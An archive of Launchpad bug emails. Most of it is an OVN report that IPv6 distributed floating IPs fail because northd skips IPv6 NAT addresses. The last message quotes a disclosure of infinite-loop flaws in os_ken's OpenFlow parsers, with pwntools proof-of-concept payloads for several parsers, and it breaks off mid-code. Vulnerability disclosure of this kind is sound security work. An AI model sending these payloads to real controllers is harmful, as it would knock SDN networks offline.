From 2075495 at bugs.launchpad.net Thu Aug 1 07:59:20 2024 From: 2075495 at bugs.launchpad.net (Reason li) Date: Thu, 01 Aug 2024 07:59:20 -0000 Subject: [Bug 2075495] [NEW] ipv6 dnat_and_snat does not work in distributed mode Message-ID: <172249916087.239635.12262043580499860531.malonedeb@juju-98d295-prod-launchpad-7> Public bug reported: Description of problem: When I use the following command to configure the ipv6 floating IP, the function does not work properly. ovn-nbctl lr-nat-add ROUTER TYPE EXTERNAL_IP LOGICAL_IP [LOGICAL_PORT EXTERNAL_MAC] version: main Examples: (ovn-sb-db)[root at control03 /]# ovn-nbctl lr-nat-add 10f6f37a-afb3-46a9-9aa6-91371cdeba1c dnat_and_snat 3333::8f fa16::f816:3eff:fe80:fb38 744e11a6-aa99-4b56-9258-e5429bed043b fa:16:3e:19:ba:cc (ovn-sb-db)[root at control03 /]# ovn-nbctl show 10f6f37a-afb3-46a9-9aa6-91371cdeba1c router 10f6f37a-afb3-46a9-9aa6-91371cdeba1c (neutron-278772e5-a800-4c2f-b74f-237dc7b35c8c) (aka route_test_ipv6nat) port lrp-44f7bde4-5ecd-44fd-8b95-d87fe60dd750 mac: "fa:16:3e:58:c8:02" networks: ["fa16::1/64"] port lrp-d135efaa-ff60-4047-a512-24fe592ebb6a mac: "fa:16:3e:f0:f3:d0" networks: ["123.123.0.1/24"] port lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe mac: "fa:16:3e:19:ba:35" networks: ["192.168.0.106/24", "3333::d1/120"] gateway chassis: [324e165cbbeefd8f611f8d6ad0ccca6c e4d7d407ee471b88ffe74fc779a26fcf 41ada164f3652920346ca3ed20e6513d] nat 8c503bae-a471-4b2f-87ce-2ab585460bee external ip: "3333::8f" logical ip: "fa16::f816:3eff:fe80:fb38" type: "dnat_and_snat" (ovn-sb-db)[root at control03 /]# ovn-nbctl list nat _uuid : 8c503bae-a471-4b2f-87ce-2ab585460bee allowed_ext_ips : [] exempted_ext_ips : [] external_ids : {} external_ip : "3333::8f" external_mac : "fa:16:3e:19:ba:cc" external_port_range : "" gateway_port : [] logical_ip : "fa16::f816:3eff:fe80:fb38" logical_port : "744e11a6-aa99-4b56-9258-e5429bed043b" options : {stateless="false"} type : dnat_and_snat Everything works fine up to this point, so keep checking ovn-sb's table port_binding (ovn-sb-db)[root at control03 /]# ovn-sbctl list port_binding 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c _uuid : 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c additional_chassis : [] additional_encap : [] chassis : [] datapath : b92d5cbf-08a4-49c1-ae24-3a0d7b0b1782 encap : [] external_ids : {"neutron:cidrs"="192.168.0.106/24 3333::d1/120", "neutron:device_id"="278772e5-a800-4c2f-b74f-237dc7b35c8c", "neutron:device_owner"="network:router_gateway", "neutron:network_name"=neutron-b6546c61-312a-47ac-9124-d19c9b871e92, "neutron:port_name"="", "neutron:project_id"="", "neutron:revision_number"="51", "neutron:security_group_ids"=""} gateway_chassis : [] ha_chassis_group : [] logical_port : "3e9af04c-1e53-42e8-943a-b46ecec15fbe" mac : [router] nat_addresses : ["fa:16:3e:19:ba:35 192.168.0.106 is_chassis_resident(\"cr-lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe\")"] options : {peer=lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe} parent_port : [] port_security : [] requested_additional_chassis: [] requested_chassis : [] tag : [] tunnel_key : 3 type : patch up : false virtual_parent : [] I found that nat_addresses has no information about ipv6 nat_addresses should have something like this "fa:16:3e:19:ba:cc 3333::8f is_chassis_resident(\"744e11a6-aa99-4b56-9258-e5429bed043b\")" I add what is missing above to nat_addresses by hand,then ipv6 distributed floating IP is functional So I think there's something wrong with ovn-northd. Reading the code in northd.c, I see that the get_nat_addresses function only checks the external_ip address in IPV4 format.Is this why the ipv6 configuration was skipped? northd.c Line 2381 static char ** get_nat_addresses(const struct ovn_port *op, size_t *n, bool routable_only, bool include_lb_ips, const struct lr_stateful_record *lr_stateful_rec) { ...... /* Get NAT IP addresses. */ for (size_t i = 0; i < op->od->nbr->n_nat; i++) { ...... char *error = ip_parse_masked(nat->external_ip, &ip, &mask); if (error || mask != OVS_BE32_MAX) { free(error); continue; } I think IPV6 address verification should be added here. Please kindly confirm this problem ** Affects: ovn (Ubuntu) Importance: Undecided Status: New ** Tags: ovn -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ovn in Ubuntu. https://bugs.launchpad.net/bugs/2075495 Title: ipv6 dnat_and_snat does not work in distributed mode Status in ovn package in Ubuntu: New Bug description: Description of problem: When I use the following command to configure the ipv6 floating IP, the function does not work properly. ovn-nbctl lr-nat-add ROUTER TYPE EXTERNAL_IP LOGICAL_IP [LOGICAL_PORT EXTERNAL_MAC] version: main Examples: (ovn-sb-db)[root at control03 /]# ovn-nbctl lr-nat-add 10f6f37a-afb3-46a9-9aa6-91371cdeba1c dnat_and_snat 3333::8f fa16::f816:3eff:fe80:fb38 744e11a6-aa99-4b56-9258-e5429bed043b fa:16:3e:19:ba:cc (ovn-sb-db)[root at control03 /]# ovn-nbctl show 10f6f37a-afb3-46a9-9aa6-91371cdeba1c router 10f6f37a-afb3-46a9-9aa6-91371cdeba1c (neutron-278772e5-a800-4c2f-b74f-237dc7b35c8c) (aka route_test_ipv6nat) port lrp-44f7bde4-5ecd-44fd-8b95-d87fe60dd750 mac: "fa:16:3e:58:c8:02" networks: ["fa16::1/64"] port lrp-d135efaa-ff60-4047-a512-24fe592ebb6a mac: "fa:16:3e:f0:f3:d0" networks: ["123.123.0.1/24"] port lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe mac: "fa:16:3e:19:ba:35" networks: ["192.168.0.106/24", "3333::d1/120"] gateway chassis: [324e165cbbeefd8f611f8d6ad0ccca6c e4d7d407ee471b88ffe74fc779a26fcf 41ada164f3652920346ca3ed20e6513d] nat 8c503bae-a471-4b2f-87ce-2ab585460bee external ip: "3333::8f" logical ip: "fa16::f816:3eff:fe80:fb38" type: "dnat_and_snat" (ovn-sb-db)[root at control03 /]# ovn-nbctl list nat _uuid : 8c503bae-a471-4b2f-87ce-2ab585460bee allowed_ext_ips : [] exempted_ext_ips : [] external_ids : {} external_ip : "3333::8f" external_mac : "fa:16:3e:19:ba:cc" external_port_range : "" gateway_port : [] logical_ip : "fa16::f816:3eff:fe80:fb38" logical_port : "744e11a6-aa99-4b56-9258-e5429bed043b" options : {stateless="false"} type : dnat_and_snat Everything works fine up to this point, so keep checking ovn-sb's table port_binding (ovn-sb-db)[root at control03 /]# ovn-sbctl list port_binding 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c _uuid : 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c additional_chassis : [] additional_encap : [] chassis : [] datapath : b92d5cbf-08a4-49c1-ae24-3a0d7b0b1782 encap : [] external_ids : {"neutron:cidrs"="192.168.0.106/24 3333::d1/120", "neutron:device_id"="278772e5-a800-4c2f-b74f-237dc7b35c8c", "neutron:device_owner"="network:router_gateway", "neutron:network_name"=neutron-b6546c61-312a-47ac-9124-d19c9b871e92, "neutron:port_name"="", "neutron:project_id"="", "neutron:revision_number"="51", "neutron:security_group_ids"=""} gateway_chassis : [] ha_chassis_group : [] logical_port : "3e9af04c-1e53-42e8-943a-b46ecec15fbe" mac : [router] nat_addresses : ["fa:16:3e:19:ba:35 192.168.0.106 is_chassis_resident(\"cr-lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe\")"] options : {peer=lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe} parent_port : [] port_security : [] requested_additional_chassis: [] requested_chassis : [] tag : [] tunnel_key : 3 type : patch up : false virtual_parent : [] I found that nat_addresses has no information about ipv6 nat_addresses should have something like this "fa:16:3e:19:ba:cc 3333::8f is_chassis_resident(\"744e11a6-aa99-4b56-9258-e5429bed043b\")" I add what is missing above to nat_addresses by hand,then ipv6 distributed floating IP is functional So I think there's something wrong with ovn-northd. Reading the code in northd.c, I see that the get_nat_addresses function only checks the external_ip address in IPV4 format.Is this why the ipv6 configuration was skipped? northd.c Line 2381 static char ** get_nat_addresses(const struct ovn_port *op, size_t *n, bool routable_only, bool include_lb_ips, const struct lr_stateful_record *lr_stateful_rec) { ...... /* Get NAT IP addresses. */ for (size_t i = 0; i < op->od->nbr->n_nat; i++) { ...... char *error = ip_parse_masked(nat->external_ip, &ip, &mask); if (error || mask != OVS_BE32_MAX) { free(error); continue; } I think IPV6 address verification should be added here. Please kindly confirm this problem To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ovn/+bug/2075495/+subscriptions From 2075495 at bugs.launchpad.net Thu Aug 1 08:11:02 2024 From: 2075495 at bugs.launchpad.net (Reason li) Date: Thu, 01 Aug 2024 08:11:02 -0000 Subject: [Bug 2075495] Re: ipv6 dnat_and_snat does not work in distributed mode References: <172249916087.239635.12262043580499860531.malonedeb@juju-98d295-prod-launchpad-7> Message-ID: <172249986369.1179113.17946428313968562690.launchpad@juju-98d295-prod-launchpad-4> ** Description changed: Description of problem: - When I use the following command to configure the ipv6 floating IP, the function does not work properly. + When I use the following command to configure the ipv6 distributed floating IP, the function does not work properly. ovn-nbctl lr-nat-add ROUTER TYPE EXTERNAL_IP LOGICAL_IP [LOGICAL_PORT EXTERNAL_MAC] version: main Examples: (ovn-sb-db)[root at control03 /]# ovn-nbctl lr-nat-add 10f6f37a-afb3-46a9-9aa6-91371cdeba1c dnat_and_snat 3333::8f fa16::f816:3eff:fe80:fb38 744e11a6-aa99-4b56-9258-e5429bed043b fa:16:3e:19:ba:cc (ovn-sb-db)[root at control03 /]# ovn-nbctl show 10f6f37a-afb3-46a9-9aa6-91371cdeba1c router 10f6f37a-afb3-46a9-9aa6-91371cdeba1c (neutron-278772e5-a800-4c2f-b74f-237dc7b35c8c) (aka route_test_ipv6nat) - port lrp-44f7bde4-5ecd-44fd-8b95-d87fe60dd750 - mac: "fa:16:3e:58:c8:02" - networks: ["fa16::1/64"] - port lrp-d135efaa-ff60-4047-a512-24fe592ebb6a - mac: "fa:16:3e:f0:f3:d0" - networks: ["123.123.0.1/24"] - port lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe - mac: "fa:16:3e:19:ba:35" - networks: ["192.168.0.106/24", "3333::d1/120"] - gateway chassis: [324e165cbbeefd8f611f8d6ad0ccca6c e4d7d407ee471b88ffe74fc779a26fcf 41ada164f3652920346ca3ed20e6513d] - nat 8c503bae-a471-4b2f-87ce-2ab585460bee - external ip: "3333::8f" - logical ip: "fa16::f816:3eff:fe80:fb38" - type: "dnat_and_snat" +     port lrp-44f7bde4-5ecd-44fd-8b95-d87fe60dd750 +         mac: "fa:16:3e:58:c8:02" +         networks: ["fa16::1/64"] +     port lrp-d135efaa-ff60-4047-a512-24fe592ebb6a +         mac: "fa:16:3e:f0:f3:d0" +         networks: ["123.123.0.1/24"] +     port lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe +         mac: "fa:16:3e:19:ba:35" +         networks: ["192.168.0.106/24", "3333::d1/120"] +         gateway chassis: [324e165cbbeefd8f611f8d6ad0ccca6c e4d7d407ee471b88ffe74fc779a26fcf 41ada164f3652920346ca3ed20e6513d] +     nat 8c503bae-a471-4b2f-87ce-2ab585460bee +         external ip: "3333::8f" +         logical ip: "fa16::f816:3eff:fe80:fb38" +         type: "dnat_and_snat" (ovn-sb-db)[root at control03 /]# ovn-nbctl list nat _uuid : 8c503bae-a471-4b2f-87ce-2ab585460bee allowed_ext_ips : [] exempted_ext_ips : [] external_ids : {} external_ip : "3333::8f" external_mac : "fa:16:3e:19:ba:cc" external_port_range : "" gateway_port : [] logical_ip : "fa16::f816:3eff:fe80:fb38" logical_port : "744e11a6-aa99-4b56-9258-e5429bed043b" options : {stateless="false"} type : dnat_and_snat Everything works fine up to this point, so keep checking ovn-sb's table port_binding (ovn-sb-db)[root at control03 /]# ovn-sbctl list port_binding 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c _uuid : 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c additional_chassis : [] additional_encap : [] chassis : [] datapath : b92d5cbf-08a4-49c1-ae24-3a0d7b0b1782 encap : [] external_ids : {"neutron:cidrs"="192.168.0.106/24 3333::d1/120", "neutron:device_id"="278772e5-a800-4c2f-b74f-237dc7b35c8c", "neutron:device_owner"="network:router_gateway", "neutron:network_name"=neutron-b6546c61-312a-47ac-9124-d19c9b871e92, "neutron:port_name"="", "neutron:project_id"="", "neutron:revision_number"="51", "neutron:security_group_ids"=""} gateway_chassis : [] ha_chassis_group : [] logical_port : "3e9af04c-1e53-42e8-943a-b46ecec15fbe" mac : [router] nat_addresses : ["fa:16:3e:19:ba:35 192.168.0.106 is_chassis_resident(\"cr-lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe\")"] options : {peer=lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe} parent_port : [] port_security : [] requested_additional_chassis: [] requested_chassis : [] tag : [] tunnel_key : 3 type : patch up : false virtual_parent : [] I found that nat_addresses has no information about ipv6 nat_addresses should have something like this "fa:16:3e:19:ba:cc 3333::8f is_chassis_resident(\"744e11a6-aa99-4b56-9258-e5429bed043b\")" I add what is missing above to nat_addresses by hand,then ipv6 distributed floating IP is functional So I think there's something wrong with ovn-northd. Reading the code in northd.c, I see that the get_nat_addresses function only checks the external_ip address in IPV4 format.Is this why the ipv6 configuration was skipped? northd.c Line 2381 static char ** get_nat_addresses(const struct ovn_port *op, size_t *n, bool routable_only, - bool include_lb_ips, - const struct lr_stateful_record *lr_stateful_rec) +                   bool include_lb_ips, +                   const struct lr_stateful_record *lr_stateful_rec) { ...... - /* Get NAT IP addresses. */ - for (size_t i = 0; i < op->od->nbr->n_nat; i++) { - ...... - char *error = ip_parse_masked(nat->external_ip, &ip, &mask); - if (error || mask != OVS_BE32_MAX) { - free(error); - continue; - } +     /* Get NAT IP addresses. */ +     for (size_t i = 0; i < op->od->nbr->n_nat; i++) { +         ...... +         char *error = ip_parse_masked(nat->external_ip, &ip, &mask); +         if (error || mask != OVS_BE32_MAX) { +             free(error); +             continue; +         } I think IPV6 address verification should be added here. Please kindly confirm this problem ** Description changed: Description of problem: When I use the following command to configure the ipv6 distributed floating IP, the function does not work properly. ovn-nbctl lr-nat-add ROUTER TYPE EXTERNAL_IP LOGICAL_IP [LOGICAL_PORT EXTERNAL_MAC] version: main Examples: - (ovn-sb-db)[root at control03 /]# ovn-nbctl lr-nat-add 10f6f37a-afb3-46a9-9aa6-91371cdeba1c dnat_and_snat 3333::8f fa16::f816:3eff:fe80:fb38 744e11a6-aa99-4b56-9258-e5429bed043b fa:16:3e:19:ba:cc + # ovn-nbctl lr-nat-add 10f6f37a-afb3-46a9-9aa6-91371cdeba1c dnat_and_snat 3333::8f fa16::f816:3eff:fe80:fb38 744e11a6-aa99-4b56-9258-e5429bed043b fa:16:3e:19:ba:cc - (ovn-sb-db)[root at control03 /]# ovn-nbctl show 10f6f37a-afb3-46a9-9aa6-91371cdeba1c + # ovn-nbctl show 10f6f37a-afb3-46a9-9aa6-91371cdeba1c router 10f6f37a-afb3-46a9-9aa6-91371cdeba1c (neutron-278772e5-a800-4c2f-b74f-237dc7b35c8c) (aka route_test_ipv6nat)     port lrp-44f7bde4-5ecd-44fd-8b95-d87fe60dd750         mac: "fa:16:3e:58:c8:02"         networks: ["fa16::1/64"]     port lrp-d135efaa-ff60-4047-a512-24fe592ebb6a         mac: "fa:16:3e:f0:f3:d0"         networks: ["123.123.0.1/24"]     port lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe         mac: "fa:16:3e:19:ba:35"         networks: ["192.168.0.106/24", "3333::d1/120"]         gateway chassis: [324e165cbbeefd8f611f8d6ad0ccca6c e4d7d407ee471b88ffe74fc779a26fcf 41ada164f3652920346ca3ed20e6513d]     nat 8c503bae-a471-4b2f-87ce-2ab585460bee         external ip: "3333::8f"         logical ip: "fa16::f816:3eff:fe80:fb38"         type: "dnat_and_snat" - (ovn-sb-db)[root at control03 /]# ovn-nbctl list nat + # ovn-nbctl list nat _uuid : 8c503bae-a471-4b2f-87ce-2ab585460bee allowed_ext_ips : [] exempted_ext_ips : [] external_ids : {} external_ip : "3333::8f" external_mac : "fa:16:3e:19:ba:cc" external_port_range : "" gateway_port : [] logical_ip : "fa16::f816:3eff:fe80:fb38" logical_port : "744e11a6-aa99-4b56-9258-e5429bed043b" options : {stateless="false"} type : dnat_and_snat Everything works fine up to this point, so keep checking ovn-sb's table port_binding - (ovn-sb-db)[root at control03 /]# ovn-sbctl list port_binding 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c + # ovn-sbctl list port_binding 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c _uuid : 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c additional_chassis : [] additional_encap : [] chassis : [] datapath : b92d5cbf-08a4-49c1-ae24-3a0d7b0b1782 encap : [] external_ids : {"neutron:cidrs"="192.168.0.106/24 3333::d1/120", "neutron:device_id"="278772e5-a800-4c2f-b74f-237dc7b35c8c", "neutron:device_owner"="network:router_gateway", "neutron:network_name"=neutron-b6546c61-312a-47ac-9124-d19c9b871e92, "neutron:port_name"="", "neutron:project_id"="", "neutron:revision_number"="51", "neutron:security_group_ids"=""} gateway_chassis : [] ha_chassis_group : [] logical_port : "3e9af04c-1e53-42e8-943a-b46ecec15fbe" mac : [router] nat_addresses : ["fa:16:3e:19:ba:35 192.168.0.106 is_chassis_resident(\"cr-lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe\")"] options : {peer=lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe} parent_port : [] port_security : [] requested_additional_chassis: [] requested_chassis : [] tag : [] tunnel_key : 3 type : patch up : false virtual_parent : [] I found that nat_addresses has no information about ipv6 nat_addresses should have something like this "fa:16:3e:19:ba:cc 3333::8f is_chassis_resident(\"744e11a6-aa99-4b56-9258-e5429bed043b\")" - I add what is missing above to nat_addresses by hand,then ipv6 - distributed floating IP is functional + I shut down ovn-northd for now and add what is missing above to + nat_addresses by hand,then ipv6 distributed floating IP is functional. So I think there's something wrong with ovn-northd. Reading the code in northd.c, I see that the get_nat_addresses function only checks the external_ip address in IPV4 format.Is this why the ipv6 configuration was skipped? northd.c Line 2381 static char ** get_nat_addresses(const struct ovn_port *op, size_t *n, bool routable_only,                   bool include_lb_ips,                   const struct lr_stateful_record *lr_stateful_rec) { ......     /* Get NAT IP addresses. */     for (size_t i = 0; i < op->od->nbr->n_nat; i++) {         ......         char *error = ip_parse_masked(nat->external_ip, &ip, &mask);         if (error || mask != OVS_BE32_MAX) {             free(error);             continue;         } I think IPV6 address verification should be added here. Please kindly confirm this problem -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ovn in Ubuntu. https://bugs.launchpad.net/bugs/2075495 Title: ipv6 dnat_and_snat does not work in distributed mode Status in ovn package in Ubuntu: New Bug description: Description of problem: When I use the following command to configure the ipv6 distributed floating IP, the function does not work properly. ovn-nbctl lr-nat-add ROUTER TYPE EXTERNAL_IP LOGICAL_IP [LOGICAL_PORT EXTERNAL_MAC] version: main Examples: # ovn-nbctl lr-nat-add 10f6f37a-afb3-46a9-9aa6-91371cdeba1c dnat_and_snat 3333::8f fa16::f816:3eff:fe80:fb38 744e11a6-aa99-4b56-9258-e5429bed043b fa:16:3e:19:ba:cc # ovn-nbctl show 10f6f37a-afb3-46a9-9aa6-91371cdeba1c router 10f6f37a-afb3-46a9-9aa6-91371cdeba1c (neutron-278772e5-a800-4c2f-b74f-237dc7b35c8c) (aka route_test_ipv6nat)     port lrp-44f7bde4-5ecd-44fd-8b95-d87fe60dd750         mac: "fa:16:3e:58:c8:02"         networks: ["fa16::1/64"]     port lrp-d135efaa-ff60-4047-a512-24fe592ebb6a         mac: "fa:16:3e:f0:f3:d0"         networks: ["123.123.0.1/24"]     port lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe         mac: "fa:16:3e:19:ba:35"         networks: ["192.168.0.106/24", "3333::d1/120"]         gateway chassis: [324e165cbbeefd8f611f8d6ad0ccca6c e4d7d407ee471b88ffe74fc779a26fcf 41ada164f3652920346ca3ed20e6513d]     nat 8c503bae-a471-4b2f-87ce-2ab585460bee         external ip: "3333::8f"         logical ip: "fa16::f816:3eff:fe80:fb38"         type: "dnat_and_snat" # ovn-nbctl list nat _uuid : 8c503bae-a471-4b2f-87ce-2ab585460bee allowed_ext_ips : [] exempted_ext_ips : [] external_ids : {} external_ip : "3333::8f" external_mac : "fa:16:3e:19:ba:cc" external_port_range : "" gateway_port : [] logical_ip : "fa16::f816:3eff:fe80:fb38" logical_port : "744e11a6-aa99-4b56-9258-e5429bed043b" options : {stateless="false"} type : dnat_and_snat Everything works fine up to this point, so keep checking ovn-sb's table port_binding # ovn-sbctl list port_binding 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c _uuid : 4b4ccff5-f030-4c66-b6eb-b7dd43db4f2c additional_chassis : [] additional_encap : [] chassis : [] datapath : b92d5cbf-08a4-49c1-ae24-3a0d7b0b1782 encap : [] external_ids : {"neutron:cidrs"="192.168.0.106/24 3333::d1/120", "neutron:device_id"="278772e5-a800-4c2f-b74f-237dc7b35c8c", "neutron:device_owner"="network:router_gateway", "neutron:network_name"=neutron-b6546c61-312a-47ac-9124-d19c9b871e92, "neutron:port_name"="", "neutron:project_id"="", "neutron:revision_number"="51", "neutron:security_group_ids"=""} gateway_chassis : [] ha_chassis_group : [] logical_port : "3e9af04c-1e53-42e8-943a-b46ecec15fbe" mac : [router] nat_addresses : ["fa:16:3e:19:ba:35 192.168.0.106 is_chassis_resident(\"cr-lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe\")"] options : {peer=lrp-3e9af04c-1e53-42e8-943a-b46ecec15fbe} parent_port : [] port_security : [] requested_additional_chassis: [] requested_chassis : [] tag : [] tunnel_key : 3 type : patch up : false virtual_parent : [] I found that nat_addresses has no information about ipv6 nat_addresses should have something like this "fa:16:3e:19:ba:cc 3333::8f is_chassis_resident(\"744e11a6-aa99-4b56-9258-e5429bed043b\")" I shut down ovn-northd for now and add what is missing above to nat_addresses by hand,then ipv6 distributed floating IP is functional. So I think there's something wrong with ovn-northd. Reading the code in northd.c, I see that the get_nat_addresses function only checks the external_ip address in IPV4 format.Is this why the ipv6 configuration was skipped? northd.c Line 2381 static char ** get_nat_addresses(const struct ovn_port *op, size_t *n, bool routable_only,                   bool include_lb_ips,                   const struct lr_stateful_record *lr_stateful_rec) { ......     /* Get NAT IP addresses. */     for (size_t i = 0; i < op->od->nbr->n_nat; i++) {         ......         char *error = ip_parse_masked(nat->external_ip, &ip, &mask);         if (error || mask != OVS_BE32_MAX) {             free(error);             continue;         } I think IPV6 address verification should be added here. Please kindly confirm this problem To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ovn/+bug/2075495/+subscriptions From 2067973 at bugs.launchpad.net Thu Aug 1 11:26:16 2024 From: 2067973 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 01 Aug 2024 11:26:16 -0000 Subject: [Bug 2067973] Fix included in openstack/os-ken 2.6.1 References: <171746781446.2640504.17587973679163791137.malonedeb@juju-98d295-prod-launchpad-7> Message-ID: <172251157679.74921.9416650014801481008.malone@juju-98d295-prod-launchpad-2> This issue was fixed in the openstack/os-ken 2.6.1 release. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to python-os-ken in Ubuntu. https://bugs.launchpad.net/bugs/2067973 Title: A series of infinite loop vulnerabilities in the os_ken Status in DragonFlow: New Status in neutron: Fix Released Status in os-ryu: New Status in OpenStack Security Advisory: Won't Fix Status in python-os-ken package in Ubuntu: New Bug description: Hello, We have recently discovered a series of infinite loop vulnerabilities in the component os_ken. Initially, our team found this issue in ryu and submitted several issues, but we realized that ryu has not been maintained for a long time. We later found out that the project is still being maintained and submitted this issue. We believe that this set of issues with os_ken as a component of the OpenFlow protocol could lead to a denial of service due to malicious attacks on controllers such as ryu and faucet, which are currently using the component, as well as other controllers based on the component. We believe that once the controller is attacked and enters a denial of service state, the switch will not function properly. Relevant details are given below: [1] OFPTableFeaturesStats parser ```python         while rest:             p, rest = OFPTableFeatureProp.parse(rest)             props.append(p)         table_features.properties = props ``` The rest variable here is obtained through the following code: ```python         (type_, length) = struct.unpack_from(cls._PACK_STR, buf, 0)         rest = buf[utils.round_up(length, 8):] ``` If the length variable is tampered with to 0, rest will get the original buffer, causing the controller to fall into an infinite loop. poc: ```python from pwn import * p=remote("0.0.0.0",6633) payload="\x04\x13\x00\x58\x00\x00\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x0000\x48\x01\x00\x00\x00\x00\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" p.send(payload) p.interactive() ``` [2] OFPHello parser ```python class OFPHello(MsgBase): ...     @classmethod     def parser(cls, datapath, version, msg_type, msg_len, xid, buf):         msg = super(OFPHello, cls).parser(datapath, version, msg_type,                                           msg_len, xid, buf)         offset = ofproto.OFP_HELLO_HEADER_SIZE         elems = []         while offset < msg.msg_len:             type_, length = struct.unpack_from(                 ofproto.OFP_HELLO_ELEM_HEADER_PACK_STR, msg.buf, offset)             ...             offset += length         msg.elements = elems         return msg ``` If the variable length is equal to 0,the offset will no longer change and the parsing will fall into an infinite loop. poc: ```python from pwn import * p=remote("0.0.0.0",6633) payload="04000010000000130001000000000010" payload=bytes.fromhex(payload) p.send(payload) p.interactive() ``` [3] OFPBucket parser ```python class OFPBucket(StringifyMixin):     @classmethod     def parser(cls, buf, offset):         (len_, weight, watch_port, watch_group) = struct.unpack_from(             ofproto.OFP_BUCKET_PACK_STR, buf, offset)         ....         while length < msg.len:             action = OFPAction.parser(buf, offset)             msg.actions.append(action)             offset += action.len             length += action.len ``` If action.len=0,the offset and length will no longer change and the parsing will fall into an infinite loop. poc: ```python from pwn import * p=remote("0.0.0.0",6633) payload="\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x0000\x28\x00\x00\x00\x00\x00\x00\x00\x20\x00\x01\xff\xff\xff\xffff\xff\xff\xff\x00\x00\x00\x00\x00\x19\x00\x00\x80\x00\x08\x0600\x00\x00\x00\x00\x00\x00\x00" p.send(payload) p.interactive() ``` [4] OFPGroupDescStats parser ```python class OFPGroupDescStats(StringifyMixin):     @classmethod     def parser(cls, buf, offset):     ....         while length < stats.length:             bucket = OFPBucket.parser(buf, offset)             stats.buckets.append(bucket)             offset += bucket.len             length += bucket.len ``` If OFPBucket.len=0,the offset and length will no longer change and the parsing will fall into an infinite loop. poc: ```python from pwn import * p=remote("0.0.0.0",6633) brk=b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00" brk+=b"\x00\x28\x00\x00" brk+=b"\x00\x00\x00\x00" bucket="00000001ffffffffffffffff000000000000001000000001ffe5000000000000" brk+=bytes.fromhex(bucket) p.send(brk) p.interactive() ``` [5] OFPFlowStats parser ```python class OFPFlowStats(StringifyMixin):         while inst_length > 0:             inst = OFPInstruction.parser(buf, offset)             instructions.append(inst)             offset += inst.len             inst_length -= inst.len ``` If inst.length =0,the offset will no longer change and the parsing will fall into an infinite loop. poc: ```python from pwn import * p=remote("0.0.0.0",6633) payload=b'\x04\x13\x010\x7f\xf9\xb1m\x00\x01\x00\x00\x00\x00\x00\x00\x00h\x00\x00\x00\x00\x00\x03\x06B,@\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc4\x00\x01\x00 \x80\x00\x00\x04\x00\x00\x00\x02\x80\x00\x08\x06\xd2\xfc:\xb8S\xf8\x80\x00\x06\x06\xce\x8f\xb2F\xcb[\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x01\xff\xe5\x00\x00\x00\x00\x00\x00\x00h\x00\x00\x00\x00\x00\x03\x06\x05#@\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00b\x00\x01\x00 \x80\x00\x00\x04\x00\x00\x00\x01\x80\x00\x08\x06\xce\x8f\xb2F\xcb[\x80\x00\x06\x06\xd2\xfc:\xb8S\xf8\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x02\xff\xe5\x00\x00\x00\x00\x00\x00\x00P\x00\x00\x00\x00\x00\x058\x81U\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x04@\x00\x01\x00\x04\x00\x00\x00\x00\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00' p.send(payload) p.interactive() ``` [6] OFPMultipartReply parser ```python class OFPMultipartReply(MsgBase):     _STATS_MSG_TYPES = {}     ....     @classmethod     def parser(cls, datapath, version, msg_type, msg_len, xid, buf):     ....             while offset < msg_len:                 b = stats_type_cls.cls_stats_body_cls.parser(msg.buf, offset)                 body.append(b)                 offset += b.length if hasattr(b, 'length') else 